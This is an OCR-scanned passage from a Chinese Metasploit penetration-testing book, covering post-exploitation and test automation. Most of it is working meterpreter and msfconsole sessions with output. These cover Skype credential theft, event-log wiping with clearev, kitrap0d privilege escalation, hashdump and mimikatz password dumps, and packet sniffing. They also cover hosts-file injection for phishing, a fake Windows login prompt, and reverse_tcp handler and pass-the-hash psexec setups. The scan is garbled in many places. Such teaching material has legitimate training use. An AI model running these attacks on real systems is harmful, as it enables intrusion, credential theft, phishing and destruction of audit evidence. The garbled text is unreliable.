假设 我 们 发 现 目 标 系 统 上 运行 着 Skype， 用 Metasploit 中 的 Skype 模 块 就 可 以 获取 它 的 密码 。 


meterpreter > run post/windows/gather/credentials/skype 
[*] Checking for encrypted salt in the registry 


Salt found and decrypted 
[*] Checking for config files in *:APPDATA*; 


Found Config.xml in C:\Users\Apex\AppData\Roaming\Skype\nipun. jaswal88V 
Found Config.xml in C:\Users\Apex\AppData\Roaming\Skype 

[*] Parsing C:\Users\Apex\AppData\Roaminq\Skype\nipun. jaswali onfig.xm 
Skype MD5 found: nipun. jaswal88:6d8d 43 


8.4.5 获取 USB 使 用 历史 信息 


Metasploit 包 含 了 一 个 恢复 USB 使 用 历史 的 模块 ， 通 过 它 可 以 查看 在 目标 系统 中 都 使 用 过 哪 
些 USB 设 备 。 当 目标 系统 中 采用 了 USB 限 制 措施 ， 只 有 特定 的 USB 设 备 才 允许 连接 的 情况 下 ， 这 
个 模块 就 非常 有 用 了 一 一 利用 这 个 模块 可 以 轻松 地 伪造 USB 描 述 符 和 硬件 ID 。 


7) 有 关 擅 造 USB 描 述 符 和 绕 过 端点 保护 的 更 多 信息 ， 请 访问 http:/www.slideshare. 


net/the netlocksmith/defcon-212-hacking-using-usb-devices。 


下 面 来 看 看 如 何 使 用 这 个 模块 。 


meterpreter > run post/windows/gather/usb history 
[*] Running module against DESKTOP -PESQ21S 
[*1 
H: Disk 4f494d44 
6: Disk 3f005f 
I: SCSIsCdRom&Ven Msft&Prod Virtual DVD-ROMZ2&1f4adffe&080000014(53f5630d-b6bf - 11d0 -94 
(f2-00a0c91efb8b) 
[*] Patriot Memory USB Device 
Disk lpftLastWriteTime Unknown 
Manufacturer QGdisk.inf,*sgenmanufacturer*;; (Standard disk drives) 
Class 
Driver (4d36e967 -e325 -11ce-bfc1-08002be10318) 0005 
[*] SanDisk Cruzer Blade USB Device 
Disk lpftLastWriteTime Unknown 
Manufacturer @disk. inf,*sgenmanufacturer*s; (Standard disk drives) 
Class 
Driver (4d36e967 -e325 -11ce-bfc1-08002be10318) 40002 
[*] UFD 3.0 Silicon-Power64G USB Device 
Disk lpftLastWriteTime Unknown 
Manufacturer @disk. inf,*sgenmanufacturer*s;; (Standard disk drives) 
Class 
Driver (4d36e967 -e325 -11ce-bfc1-08002be10318)0003 


8.4.6 使 用 Metasploit 查找 文件 
Metasploit 提 供 了 一 个 非常 酷 的 文件 查找 命令 ， 利 用 它 可 以 找到 你 感 兴趣 的 文件 ， 甚 至 还 可 
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以 下 载 这 些 文件 。 使 用 search 命 令 可 以 列 出 所 有 文件 的 详细 信息 ， 如 下 图 所 示 。 


meterpreter > search -f *.doc 
Found 162 results... 

c:\Program Files (x86) Microsoft OfficeV0fficel12V1033VPROTTPLN.DOC (19968 bytes) 

c:\Program Files (x86) Microsoft OfficeV0fficel12V1033VPROTTPLV.DOC (19968 bytes) 

c:\Program Files (x86) Microsoft Visual Studio 12.0\Common7\IDE\ProjectTemplates\CSharp 
XOfficeMAddinsV 1033 VVSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7MIDE MP rojectTemplatesVCSharp 
XOfficeMAddins V 1033 NVSTOWord2010DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7MIDE MP rojectTemplatesWVisual 
Basic V0fficeMAddins V 1033 VSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7MIDE MP rojectTemplates V Visual 
BasicV0fficeMAddins V 1033 V VSTOWord2010DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7MIDEMP rojectTemplatesCacheVC 
SharpVOfficeMAddins M 1033 V VSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7MIDE MP rojectTemplatesCacheVC 
Sharp X0fficeMAddinsV 1033 NVSTOWord2010DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0\Common7\IDE\ProjectTempLatesCache\V 
isualBasicVOfficeMAddins V 1033 V VSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7MIDE MP rojectTemplatesCacheNVV 
isualBasicV0fficeM ddinsV 1033 VVSTOWo rd2010DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0NVBXSpecifications V 1033 V Visual Basic 
Language Specification.docx (683612 bytes) 

c:\Program Files (x86) Microsoft Visual Studio 12.0 NVC£ASpecifications V 1033XCSharp Lang 
uage Specification.docx (791626 bytes) 

c:\Program Files (x86) WXResumeMaker Professional\DATA\Federal\Federal Forms Listing.doc 
(30720 bytes) 


8.4.7 使 用 clearev 命令 清除 目标 系统 上 的 日 志 
可 以 使 用 clearev 命 令 清 除 目 标 系 统 上 的 所 有 日 志文 件 。 


meterpreter > cLearev 

[*] Wiping 13075 records from Application... 
[*] Wiping 16155 records from System... 

*] Wiping 26212 records from Security... 


不 过 除非 是 执法 部 门 , 否则 你 不 应 该 从 目标 系统 上 删除 日 志 ,， 因为 这 些 日 志 可 以 向 蓝 队 提 供 
大 量 有 用 的 信息 供 其 加 固 防 御 措 施 。Metasploit 中 男 一 个 用 来 处 理 日 志 的 模块 就 是 
event_manager， 使 用 方法 如 下 图 所 示 。 


T 


Imeterpreter > run event manager -i 

[*] Retriving Event Log Configuration 

Event Logs on System 

Name Retention Maximum Size Records 
Application Disabled 20971520K 6 
Cobra Disabled ^ 524288K 51 
HardwareEvents Disabled 20971520K 0 
Internet Explorer Disabled K 0 
Key Management Service Disabled 20971520K 0 
OAlerts Disabled — 131072K 34 
0Diag Disabled 16777216K 0 
OSession Disabled 16777216K 426 
PreEmptive Disabled K 0 
Security Disabled 20971520K 3 
System Disabled 20971520K 1 
Windows PowerShell Disabled 15728640K 169 


下 一 节 将 会 讲解 Metasploit 中 的 高 级 扩展 功能 。 
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8.5 Metasploit 中 的 高 级 扩展 功能 
本 章 涵 盖 大 量 后 渗透 模块 ， 现 在 先 来 介绍 Metasploit 中 的 一 些 高 级 渗透 功能 。 


8.5.1 用 Metasploit 提升 权限 


在 渗透 测试 的 过 程 中 ， 经 常会 遇 到 访问 受 限 的 情况 ， 例 如 在 运行 hashdump 命 令 时 ， 可 能 会 
遇 到 如 下 的 错误 。 


meterpreter > hashdump 
[-] priv passwd get sam hashes: Operation failed: The parameter is incorrect. 


在 这 种 情况 下 ， 如 果 试 图 使 用 getsystem 命 令 获 得 系统 级 权限 ， 就 会 遇 到 如 下 错误 。 


meterpreter > getuid 

Server username: WIN-SWIKKOTKSHXNmm 

meterpreter » getsystem 

[-] priv elevate getsystem: Operation failed: Access is denied. The following wa 
s attempted: 

[-] Named Pipe Impersonation (In Memory/Admin) 

[-] Named Pipe Impersonation (Dropper/Admin) 

[-] Token Duplication (In Memory/Admin) 


但 是 遇 到 这 种 情况 时 该 怎么 做 呢 ? 答案 就 是 使 用 后 渗透 模块 将 控制 权限 提高 至 最 高 级 别 。 下 
面 的 演示 是 在 Windows Server 2008 SP1 操 作 系统 上 进行 的 ， 其 中 使 用 本 地 渗透 模块 绕 过 了 限制 并 
获得 了 目标 的 完全 管理 权限 。 


msf exploit(ms18 615_kitrapgd) > show options 
Module options (exploit/windows/local/ms10 015 kitrapOd): 


Name Current Setting Required Description 


SESSION yes The session to run this module on. 


Exploit target: 


Id Name 


0 Windows 2K SP4 - Windows 7 (x86) 


msf exploit(ms10 015 kitrap8d) > set SESSION 3 
SESSION -» 3 
msf exploit(ms10 015 kitrap8d) > exploit 


[*] Started reverse TCP handler on 192.168.10.112:4444 
[*] Launching notepad to host the exploit... 

Process 1856 launched. 
[*] Reflectively injecting the exploit DLL into 1856... 
[*] Injecting exploit into 1856 ... 
[*] Exploit injected. Injecting payload into 1856... 
[*] Payload injected. Executing exploit... 

Exploit finished, wait for (hopefully privileged) payload execution to compl 


[*] Sending stage (957487 bytes) to 192.168.10.109 
[*] Meterpreter session 4 opened (192.168.10.112:4444 -> 192.168.10.109:49175) a 
t 2016-07-10 14:09:42 40530 


meterpreter > | | 
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在 上 面 的 截图 中 ， 我 们 使 用 exploit/windows/local/ms10_ 015_kitrap0d 渗 透 模 块 提 
升 了 控制 权限 ， 并 获得 了 最 高 级 别 的 管理 权限 。 接 下 来 使 用 getuida 命 令 检查 当前 的 权限 级 别 。 


meterpreter > getuid 
Server username: NT AUTHORITYNSYSTEM 


meterpreter > syšinto 


Computer WIN-SWIKKOTKSHX 

0S : Windows 2008 (Build 6001, Service Pack 1) 
Architecture : x86 

System Language : en US 

Domain : WORKGROUP 

Logged On Users : 4 

Meterpreter : x86/win32 


我 们 已 经 获得 了 系统 级 管理 权限 ， 现 在 就 可 以 在 目标 系统 上 执行 任何 操作 了 。 


有 关 kitrap0d 渗 透 模块 的 更 多 信息 ， 请 访问 https://technet.microsoft.com/en-us/ 
library/security/ms1-15.aspx。 


运行 hashdump 命 令 ， 检 查 这 个 模块 是 否 正常 工作 。 


meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:01c714f171b670ce8f719f2d07812| 
470::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0: : : 
mm: 1000 : aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0: : : 


干 得 不 错 ! 我 们 已 经 获得 了 系统 的 哈 希 值 。 


8.5.2 使 用 mimikatz 查找 明文 密码 


mimikatz 是 Metasploit 中 一 个 功能 极为 强大 的 附加 工具 ， 它 可 以 直接 从 lsass 服 务 获取 
Windows 中 状态 为 活跃 的 的 账号 的 明文 密码 。 虽 然 之 前 我 们 已 经 通过 pass-the-hash 使 用 过 哈 希 值 ， 
不 过 在 很 多 时 候 渗透 都 是 把 时 间 放 在 第 一 位 的 ， 知 道 了 密码 就 可 以 节省 大 量 时 间 。 另 外 在 HITP 
进行 基本 身份 认证 的 时 候 ， 也 需要 知道 密码 ( 而 不 是 哈 希 值 )。 


可 以 在 Metasploit 中 使 用 1oaqd mimikatz 命 邻 载 和 人 mimikatz 模 块 ， 之 后 就 可 以 使 用 
mimikatz 模 块 中 的 kerberos 命 令 来 查找 密码 。 


meterpreter > kerberos 

Running as SYSTEM 
[*] Retrieving kerberos credentials 
kerberos credentials 


AuthID Package Domain User Password 
0;999 NTLM WORKGROUP WIN- -SWIKKOTKSHXS 

0;996 Negotiate WORKGROUP WIN-SWIKKOTKSHX$ 

0;34086 NTLM 

0;387971 NTLM WIN-SWIKKOTKSHX mm 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;995 Negotiate NT AUTHORITY IUSR 

0;137229 NTLM WIN-SWIKKOTKSHX Administrator Nipun@123 


0;257488 NTLM WIN-SWIKKOTKSHX Administrator Nipun@123 


8.5 Metasploit 中 的 高 级 扩展 功能 229 


8.5.3 使 用 Metasploit 进行 流量 嗅 探 


对 了 ，Metasploit 还 提供 了 嗅 探 目标 主机 流量 的 功能 自控 特定 网 络 接口 
流量 , 还 可 以 嗅 探 目 标 上 所 有 网 络 接口 的 流量 。 我 们 可 以 先 列 出 目 标 主机 上 的 所 有 网 络 接口 ， 然 
后 选择 列表 中 的 一 个 。 


meterpreter > sniffer interfaces 


1 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:t 
rue wifi:false ) 

2 - 'Realtek RTL8723BE Wireless LAN 802.11n PCI-E NIC' ( type:0 mtu:1514 usable:true 
dhcp:true wifi:false ) 

3 - 'VMware Virtual Ethernet Adapter for VMnetl' ( type:0 mtu:1514 usable:true dhcp:t 
rue wifi:false ) 

4 - 'Microsoft Kernel Debug Network Adapter' ( type:4294967295 mtu:0 usable:false dhc 
p:false wifi:false ) 

5 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi 
:false ) 

6 - 'Microsoft Wi-Fi Direct Virtual Adapter' ( type:0 mtu:1514 usable:true dhcp:true 
Wifi:false ) 

7 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:fa 
lse ) 


8 - 'SonicWALL Virtual NIC' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:fals 


e 

9 - 'TAP-Windows Adapter V9' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

10 - 'VirtualBox Host-O0nly Ethernet Adapter' ( type:0 mtu:1518 usable:true dhcp:false 
wifi:false ) 


11 - 'Bluetooth Device (Personal Area Network)' ( type:0 mtu:1514 usable:true dhcp:tr 
ue wifi:false ) 


目标 主机 上 有 多 个 网 络 接口 。 现 在 在 无 线 网 络 接口 上 启动 嗅 探 功 能 , 这 个 网 络 接口 的 ID 为 2 ， 
如 下 图 所 示 。 


meterpreter > sniffer_start 2 1000 

[*] Capture started on interface 2 (1000 packet buffer) 
meterpreter > sniffer_dump 

[-] Usage: sniffer dump [interface-id] [pcap-file] 
meterpreter » sniffer dump 2 2.pcap 

[*] Flushing packet capture buffer for interface 2... 
[*] Flushed 1000 packets (600641 bytes) 

[*] Downloaded 087% (524288/600641)... 

[*] Downloaded 100% (600641/600641)... 

[*] Download completed, converting to PCAP... 


[*] PCAP file written to 2.pcap 
fM Asniffer start 2 1000 命 令 启动 无 线 网 络 接 口上 的 嗅 探 功 能 ， 其 中 2 表示 无 线 网 卡 的 


ID ，1000 是 缓冲 区 的 大 小 。 使 用 sniffet dump 命 令 便 可 以 成 功 下 载 pcap 文 件 。 如 果 你 想 查 看 在 
pcap 文 件 中 收集 了 哪些 数据 包 ， 可 以 使 用 如 下 图 所 示 的 命令 在 Wireshark 中 查看 。 


[rootemm: -# wireshark 2.pcap 


在 pcap 文 件 中 有 大 量 数据 包 ， 其 中 包含 了 DNS 查询 、HTTP 请 求 和 以 明文 保存 的 密码 。 


230 第 8 章 社会 工程 工具 包 


Filter: http ~ |Expression.. Clear Apply Save 
No. Time Source Destination Protocol Length Info 
20 0.000000 117.18.237.29 192.168.10.105 OCSP 842 Response 
130 2.000000 202.125.152.245 192.168.10.105 HTTP 1299 HTTP/1.1 200 OK (text/html) 
170 3.000000 52.84.101.29 192.168.10.105 HTTP. 615 HTTP/1.1 200 OK (GIF89a) 
209 4.000000 202.125.152.245 192.168.10.105 HTTP 1417 HTTP/1.1 200 OK (text/css) 
364 6.000000 202.125.152.245 192.168.10.105 HTTP 639 HTTP/1.1 200 OK (image/x-icon) 
414 7.000000 54.79.123.29 192.168.10.105 HTTP 1038 HTTP/1.1 200 OK (text/css) 
426 7.000000 54.79.123.29 192.168.10.105 HTTP. 497 HTTP/1.1 301 Moved Permanently (text/html) 
471 8.000000 54.79.123.29 192.168.10.105 HTTP 761 HTTP/1.1 200 OK (text/javascript) 
487 9.000000 96.17.182.48 192.168.10.105 OCSP 224 Response 
492 9.000000 96.17.182.48 192.168.10.105 OCSP 224 Response 
543 14.000000 202.125.152.245 192.168.10.105 HTTP 528 HTTP/1.1 302 Found 
573 15.000000 202.125.152.245 192.168.10.105 HTTP 1403 HTTP/1.1 200 OK (text/html) 
588 15.000000 202.125.152.245 192.168.10.105 HTTP 302 HTTP/1.1 200 OK (text/javascript) 
657 16.000000 192.168.10.1 239.255.255.250 SSDP 367 NOTIFY * HTTP/1.1 
665 17.000000 192.168.10.1 239.255.255.250 SSDP 376 NOTIFY * HTTP/1.1 
673 17.000000 192.168.10.1 239.255.255.250 SSDP 439 NOTIFY * HTTP/1.1 
677 17.000000 192.168.10.1 239.255. 255. 250 SSDP 376 NOTIFY * HTTP/1.1 
678 17.000000 192.168.10.1 239.255.255.250 SSDP 415 NOTIFY * HTTP/1.1 
681 17.000000 192.168.10.1 239.255.255.250 SSDP 376 NOTIFY * HTTP/1.1 
683 17.000000 192.168.10.1 239.255.255.250 SSDP 435 NOTIFY * HTTP/1.1 
684 17.000000 192.168.10.1 239.255.255.250 SSDP 429 NOTIFY * HTTP/1.1 
817 33.000000 192. 168.10. 101 239.255. 255.250 SSDP 355 NOTIFY * HTTP/1.1 
818 33.000000 192.168.10.101 239.255.255.250 SSDP 355 NOTIFY * HTTP/1.1 
819 34.000000 192.168.10.101 239.255.255.250 SSDP 358 NOTIFY * HTTP/1.1 
820 34.000000 192.168.10.101 239.255.255.250 SSDP 358 NOTIFY * HTTP/1.1 


8.5.4 使 用 Metasploit 对 host 文件 进行 注入 


可 以 通过 对 目标 主机 的 host 文 件 进 行 注 入 展开 钓鱼 攻击 一 一 将 指定 域名 的 条 目 添加 到 目标 主 
机 的 host 文 件 中 。 


下 面 来 看 看 如 何 使 用 Metasploit 实 现 对 host 文 件 的 注入 。 


msf exploit(handler) > use post/windows/manage/inject host 
msf post(inject host) > show options 


Module options (post/windows/manage/inject host): 


Name Current Setting Required Description 

DOMAIN yes Domain name for host file manipulation. 
IP yes IP address to point domain name to. 
SESSION yes The session to run this module on. 


msf post(inject host) > set DOMAIN www.yahoo.com 
DOMAIN —» www.yahoo.com 

msf post(inject host) > set IP 192.168.10.112 

IP -» 192.168.10.112 

msf post(inject host) > set SESSION 1 

SESSION => 1 

msf post(inject host) > exploit 


[*] Inserting hosts file entry pointing www.yahoo.com to 192.168.10.112.. 
Done! 
[*] Post module execution completed 


可 以 看 到 我 们 在 会 话 1 中 使 用 了 post/windows/manage/inject_host 模 块 ， 并 在 目标 的 
host 文 件 中 添加 了 一 个 条 目 。 现 在 来 看 看 当 目 标 试图 访问 yahoo.com 时 会 发 生 什 么 。 
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(9 Apache2 Debian Default Page 


This is the default welcome page used to test the correct operation of the Apache2 server after 
installation on Debian systems. If you can read this page, it means that the Apache HTTP server 


installed at this site is working properly. You should replace this file (located at /var/www 
/html/index.html) before continuing to operate your HTTP server. 


If you are a normal user of this web site and don't know what this page is about, this probably means 
that the site is currently unavailable due to maintenance. If the problem persists, please contact the 
site's administrator. 


目标 主机 的 浏览 器 被 定位 到 了 我 们 的 恶意 服务 器 ， 这 个 服务 器 上 运行 着 钓鱼 网 站 。 


8.5.5 登录 密码 的 钓鱼 窗口 


Metasploit 包 含 了 一 个 针对 登录 密码 的 钓鱼 窗口 模块 。 它 可 以 生成 一 个 钓鱼 窗口 ， 这 个 窗口 
的 外 观 和 Windows 系 统 的 认证 弹 窗 一 模 一 样 。 对 于 用 户 来 说 ， 这 个 弹出 窗口 是 强制 性 的 ， 只 有 当 
用 户 填 写 了 用 户 名 和 密码 之 后 系统 才能 正常 工作 。 所 以 我 们 可 以 利用 这 个 窗口 来 资 取 用 户 
凭证 。 HJ 以 使 用 post/windows/gather/phish_ login_pass 模 块 来 完成 这 文 个 任务 。 MS 
个 模块 的 时 候 ， 目 标 上 就 会 弹出 一 个 如 下 图 所 示 的 钓鱼 窗口 。 


Recyde Bin 


User name: 


Password: 


£7Start| | mEBEZÉ& | Ê Local Disk (C) 


Ada 2:20PM 


^| Untitled - Notepad 
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当 目 标 填写 了 用 户 名 和 密码 之 后 ， 我 们 就 可 以 看 到 以 纯 文本 形式 保存 的 信息 ， 如 下 图 所 示 。 


meterpreter > run post/windows/gather/phish windows credentials 


PowerShell is installed. 
[*] Starting the popup script. Waiting on the user to fill in his credentials... 
#< CLIXML 


UserName Domain Password 


mm WIN-SWIKKOTKSHX NipunQ123 


我 们 轻而易举 地 获得 了 目标 的 登录 信息 。 正 如 在 本 章 所 看 到 的 ，Metasploit 提 供 了 大 量 用 于 
后 渗透 的 功能 ， 还 具备 与 独立 工具 (例如 mimikatz ) 和 本 地 脚本 协同 工作 的 能 


本 章 详 细 介绍 了 后 渗透 模块 ， 以 及 从 基础 到 高 级 的 各 种 后 渗透 测试 场景 。 此 外 ,还 介绍 了 在 
Windows 环 境 中 提升 权限 的 方法 和 高 级 技术 。 


在 下 一 章 中 ,我 们 将 了 解 如 何 加 快 渗透 测试 的 进程 ， 领 略 Metasploit 相 较 手 动 技术 的 优势 所 
在 ， 并 且 学 会 各 种 节省 时 间 和 金钱 的 自动 化 方法 。 


提高 渗透 测试 的 速度 


“如 果 事 情 看 上 去 都 在 掌控 之 中 ， 那 就 别 犹 称 ， 加 快速 度 。” 


Mario Andretti 


在 进行 渗透 测试 的 时 候 , 对 时 间 的 把 控 非 常 重 要 。 如 果 渗 透 测 试 的 实际 过 程 耗费 了 比 预 期 更 
多 的 时 间 ， 可 能 会 导致 用 户 失 去 对 测试 的 信心 、 预 算 超支 、 失 去 潜在 客户 以 及 其 他 不 良 后 果 。 


在 这 一 章 中 ,我 们 将 使 用 Metasploit 中 的 自动 化 工具 和 方法 加 快 渗透 测试 的 节奏 ,要 点 如 下 。 


a 动态 切换 模块 。 

a 实现 后 渗透 测试 的 自动 化 。 

a 提高 渗透 模块 的 编写 速度 

a 使 用 社会 工程 学 工具 包 加 1 快 攻击 载荷 的 生成 速度 


这 种 自动 化 测试 策略 不 仅 可 以 缩短 测试 时 间 ， 而 且 也 降低 了 单位 时 间 内 的 人 工 成 本 。 


9.1 pushm 和 popm 命令 的 使 用 方法 


Metasploit 中 提供 了 两 个 功能 极为 强大 的 命令 : pushm 和 popm。 使 用 pushm 命 令 可 以 将 当前 
模块 放 入 模块 栈 中 ， 而 popm 命 TERTRE s 不 过 这 并 不 是 可 以 用 于 进程 的 标准 
栈 ， 而 是 Metasploit 中 一 个 概念 相同 的 工具 并 不 相同 。 使 用 这 些 命令 的 优势 在 于 可 以 实 
现 快 捷 操 作 ， 从 而 为 测试 者 节省 了 大 量 的 时 间 和 精力 。 


下 面 来 考虑 一 个 场景 : 我 们 正在 测试 一 台 有 多 种 漏洞 的 内 部 网 络 的 服务 器 ,而 且 要 对 其 中 的 
所 有 系统 都 进行 两 种 不 同 的 渗透 测试 。 为 了 能 对 每 台 服 务 器 都 进行 这 两 种 测试 , 我 们 就 需要 一 个 
能 在 这 两 个 渗透 模块 之 间 快 速 切 换 的 机 制 。 在 这 种 情况 下 就 可 以 使 用 pushm 和 popm 命 令 。 我们 可 9 
以 使 用 一 个 渗透 模块 对 服务 器 的 某 个 漏洞 进行 测试 , 然后 将 这 个 模块 放 入 模块 栈 中 , 操作 完成 之 
后 再 载 人 男 一 个 渗透 模块 。 使 用 第 二 个 模块 完成 任务 之 后 ， 就 可 以 使 用 popm 命 令 将 第 一 个 模块 
(仍然 保持 之 前 的 所 有 选项 设置 ) 从 栈 中 弹出 。 
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通过 下 图 来 了 解 更 多 内 容 。 


从 上 


msf exploit(psexec) > pushm 

msf exploit(psexec) > use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(handler) > set LHOST 192.168.10.112 

LHOST => 192.168.10.112 

msf exploit(handler) > set LPORT 8080 

LPORT => 8080 

msf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.112:8080 
[*] Starting the payload handler... 


multi/handler 模 块 。 当 使 用 handler 完 成 操作 之 后 ， 就 可 以 使 用 popm 命 
psexec 模 块 ， 如 下 图 所 示 。 


msf exploit(handler) > popm 
msf exploit(psexec) > show options 


Module options (exploit/windows/smb/psexec): 


Name Current Setting 
Required Description 


RHOST 192.168.10.109 
yes The target address 
RPORT 445 
es Set the SMB service port 


SERVICE_DESCRIPTION 

no Service description to to be use 

d on target for pretty listing 
SERVICE DISPLAY NAME 


no The service display name 
SERVICE NAME 

no The service name 
SHARE Administrator$ 


yes The share to connect to, can be 

an admin share (ADMIN$,C$,...) or a normal read/write folder share 
SHBDomain T 
no The Windows domain to use for au 


thentication 
SMBPass aad3b435b51404eeaad3b435b51404ee: 01c714f17 
1b670ce8f719f2d07812470 no The password for the specified u 


sername 


图 可 以 看 出 ， 我 们 已 经 使 用 pushm 命 令 将 psexec 模 块 放 入 栈 中 ， 并 加 载 了 exploit/ 
令 从 栈 中 再 次 加 载 


从 模块 栈 中 弹出 的 psexec 跟 之 前 的 设置 一 样 ， 所 以 无 须 再 设置 这 个 模块 的 选项 了 。 


9.2 1loadpath 命令 的 使 用 


在 开发 Metasploit 模 块 的 时 候 ， 需 要 将 模块 放置 在 对 应 的 分 类 文件 夹 中 。 不 过 一 旦 Metasploit 
更 新 , 所 有 的 模块 都 会 被 删除 , 所 以 每 次 更 新 都 需要 重新 将 这 些 模块 放置 到 对 应 的 文件 夹 中 。 为 
之 个 限制 ， 可 以 为 Metasploit 创 建 一 个 主 目录 之 外 的 外 部 目录 ， 然 后 从 这 个 外 部 目录 中 加 
载 模块 。 这 样 当 Metasploit 更 新 的 时 候 ， 自 定义 的 模块 就 不 会 被 删除 了 。 


在 下 面 的 示例 中 ， 我 们 将 所 有 模块 都 复制 到 了 一 个 位 于 桌面 的 文件 夹 mods 中 。 为 了 能 使 用 


了 摆脱 这 
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Metasploit 目 录 中 的 模块 ， 还 需要 让 mods 文 件 夹 的 目录 结构 与 Metasploit 的 目录 结构 完全 相同 ， 这 
意味 着 加 载 路 径 将 成 为 Metasploit 目 录 结 构 的 虚拟 分 支 。 接 下 来 看 看 在 Metasploit 中 加 载 的 自 定 义 
路 径 ， 如 下 面 的 截图 所 示 。 


Desktop mods exploits | misc 


Apex- Wordpress. easy chat. 2point2. ftp. version. server scanner. 0.2. 
Detector.rb rb scanner. final.rb rb 


在 上 图 中 , 我 们 将 自 定 义 的 模块 放置 到 了 桌面 mods 文 件 夹 的 exploits/misc 目 录 中 。 将 自 定义 路 
径 载 和 到 Metasploit 之 后 ,就 可 以 使 用 exploit/misc 文 件 中 的 模块 了 。 下 面 的 截图 给 出 了 在 Metasploit 
中 加 载 路 径 的 示例 。 


sf > loadpath /root/Desktop/mods 


Loaded 4 modules: 
4 exploits 


我 们 已 经 成 功 载 人 了 所 有 模块 ， 现 在 就 来 检查 一 下 这 些 模 块 能 否 在 Metasploit 中 正常 使 用 ， 
检查 过 程 如 下 图 所 示 。 


msf > use exploit/misc/ 

use exploit/misc/Apex Wordpress Detector 
use exploit/misc/easy chat 2point2 

use exploit/misc/ftp version scanner final 
use exploit/misc/server scanner 0.2 


从 上 图 可 以 看 出 ， 所 有 的 自 定 义 模块 都 可 以 在 Metasploit 中 使 用 。 因 此 无 论 Metasploit 更 新 多 
少 次 ， 自 定义 模块 都 不 会 丢失 ,而 且 可 以 想 加 载 多 少 次 就 加 载 多 少 次 ， 从 而 节省 了 每 次 将 所 有 模 
块 复制 到 指定 目录 的 时 间 。 


9.3 使 用 reload、edit 和 reload all 命令 加 快 开 发 过 程 


在 模块 的 开发 阶段 , 我 们 可 能 需要 对 它 进行 一 次 又 一 次 的 测试 。 每 次 修改 新 模块 时 都 要 关闭 
Metasploit， 这 不 仅 十 分 耗 时 还 让 人 觉得 厌烦 。 因 此 必须 有 一 个 能 让 Metasploit 异 块 开发 变 得 简单 、 
快速 而 有 趣 的 机 制 。 所 幸 Metasploit 提 供 了 具备 类 似 功 能 的 reload、edit 和 reload_all 命 令 ， 
使 模块 的 开发 过 程 变 得 容易 了 许多 。 我 们 可 以 使 用 edit 命 令 动 态 修改 Metasploit 中 的 模块 ， 并 在 
不 关闭 Metasploit 的 情况 下 使 用 r*eloaa 命 令 重 新 载 人 编辑 过 的 模块 。 如 果 对 多 个 模块 进行 了 修 
改 ， 就 可 以 在 Metasploit 中 使 用 reloadq_al1 命 令 一 次 性 载 人 所 有 模块 。 
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下 面 来 看 一 个 示例 。 


'Payload" => 
{ 
' Space ' => 448] 
'DisableNops ' => true, 
'BadChars ' => "\x00\x0a\x0d", 
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 
u 


在 上 面 的 截图 中 ， 我 们 输入 了 edit 命 令 对 exploit/windows/ftp 文 件 夹 下 的 freefloatftp_user.rb 
渗透 脚本 进行 了 修改 。 我 们 将 攻击 载荷 的 大 小 从 444 修 改 为 448， 然 后 保存 这 个 脚本 。 接 下 来 只 需 
要 输入 reload 命 令 ， 更 新 Metasploit 模 块 的 源 代码 即 可 ， 这 个 过 程 如 下 图 所 示 。 


Imsf exploit(freefloatftp user) > edit 

[*] Launching /usr/bin/vim /usr/share/metasploit-f ramework/modules/exploits/windows/ftp/freefloatftp user.rb 
Imsf exploit(freefloatftp user) > reload 

[*] Reloading module... 

Imsf exploit(freefloatftp user) > B 


使 用 reloaq 命 令 就 无 须 在 启用 新 模块 时 重新 启动 Metasploit 了 。 


E 在 Metasploit 中 使 用 eqit 命 令 将 会 启用 VI 编 辑 器 对 模块 进行 编辑 。 有 关 VI 编 


辑 器 的 更 多 信息 ， 请 访问 http:/www.tutorialspoint.com/unix/unix-vi-editor.htm。 


9.4 ”资源 脚本 的 使 用 方法 


Metasploit 可 以 通过 资源 脚本 实现 自动 化 一 一 使 用 资源 脚本 可 以 免 去 手动 设置 选项 ， 实 现 选 
项 的 自动 化 设置 ， 从 而 节省 了 配置 模块 选项 和 攻击 载荷 所 花费 的 时 间 。 

创建 资源 脚本 有 两 种 方法 : 手动 创建 脚本 或 使 用 makerc 命 令 创 建 脚 本 。 我 个 人 比较 偏向 使 
用 makerc 命 令 ， 因 为 这 样 可 以 避免 输入 错误 。 makerc 命 令 将 之 前 输入 过 的 所 有 命令 都 保存 到 了 
一 个 文件 中 ， 可 以 使 用 resource 命 令 来 使 用 这 个 文件 ， 下 图 中 给 出 了 一 个 示例 。 


Imsf > use exploit/multi/handler 

Imsf exploit(handler) > set payload windows/meterpreter/reverse tcp 

payload => windows/meterpreter/reverse tcp 

msf exploit(handler) > set LHOST 

set LHOST 192.168.10.112 set LHOST fe80::a00:27ff:fe55:fcfa'sethO 
msf exploit(handler) > set LHOST 192.168.10.112 

LHOST => 192.168.10.112 

msf exploit(handler) > set LPORT 4444 

LPORT => 4444 

msf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.112:4444 
